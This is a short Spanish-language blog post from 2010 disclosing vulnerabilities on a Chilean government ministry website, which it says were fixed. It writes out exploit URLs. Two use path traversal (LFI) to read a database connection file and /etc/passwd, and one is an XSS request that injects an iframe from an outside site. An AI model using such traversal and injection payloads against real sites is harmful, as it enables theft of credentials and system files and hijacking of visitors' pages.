janito24

Vulnerabilidad en minagri.gob.cl

In Uncategorized on enero 21, 2010 at 6:52 am

Sitio web: http://www.minagri.gob.cl/
Descubridor: Ari-Slash
Fecha de descubrimiento: 16 de enero de 2010
Fecha de notificación: 16 de enero de 2010
Fecha de publicación: 16 de enero de 2010
Arreglado: si 18 de enero de 2010 (ni siquiera un gracias ¬¬ )
Vulnerabilidad: LFI
Código:
http://www.minagri.gob.cl/tips/descargar.php?file=../include/php/conectaBD.php
http://www.minagri.gob.cl/tips/descargar.php?file=../../../../etc/passwd

Vulnerabilidad: XSS
Código:
http://www.minagri.gob.cl/buscar.php?txt_busca=d%22%3E%3Ciframe%20src=http://skydrive.cl/foro%3E%3C/iframe%3E%3C

Me gusta:

Sé el primero en decir que te gusta esta post.

▶ Sin Respuestas

Deja un comentario Cancelar respuesta

Añade tu comentario aquí...

Please log in using one of these methods to post your comment:

Correo electrónico (requerido) (Address never made public)

Nombre (requerido)

Sitio Web

You are commenting using your WordPress.com account. ( Log Out / Cambiar )

You are commenting using your Twitter account. ( Log Out / Cambiar )

You are commenting using your Facebook account. ( Log Out / Cambiar )

Connecting to %s

Seguir

Follow “. : [ h 4 c k v i 5 0 5 ] : .”

Powered by WordPress.com